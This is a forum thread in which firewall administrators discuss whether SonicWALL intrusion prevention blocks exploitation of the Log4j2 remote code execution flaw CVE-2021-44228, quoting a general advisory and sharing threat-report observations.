SonicWALL Firewalls will work against Apache Log4j2 Remote Code Execution CVE-2021-44228?
May I know the SonicWALL firewalls will work against the latest Apache vulnerability? Apache Log4j2 Remote Code Execution CVE-2021-44228.
Is there any mitigation steps/plan from SonicWALL for this vulnerability?
""On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 was identified being exploited in the wild. Public proof of concept (PoC) code was released, and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched. Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking out and exploiting unpatched systems. We highly recommend that organizations upgrade to the latest version (2.15.0-rc2) of Apache log4j 2 for all systems.""
@Ajishlal - Does this answer your question?
As per my Firewall Threat Report, IPS is preventing the Apache Log4j remote code execution attack.
Hmmm, this must be a TZ series "feature" of which I was never aware.
All the devices in my fleet have AGSS subscriptions.
However, it appears that none of them report on anything except Multimedia. Virus, Intrusions, Spyware - all zero for the past 21 days.
Now I'm wondering, what's going on. Is it possible that the Bergen County, NJ ISPs are really that good at preventing downstream stuff from hitting?
The above report / feature from NSa 9250 with AGSS.
Getting more hit.
Overall, whether you see this in the graph or not is really based on the percentages of how many times the exploit is being attempted. If you have so many others, it doesn't qualify as a "Top Intrusion" that shows up on the list. I can certainly filter in the logs for it and see when it happens on our networks.
I've also done remote scans for affected devices with Nessus and the firewall blocks all the attempts of the exploit and detection with the scanner. Looks like the SonicWalls are doing their jobs, which is nice. 💪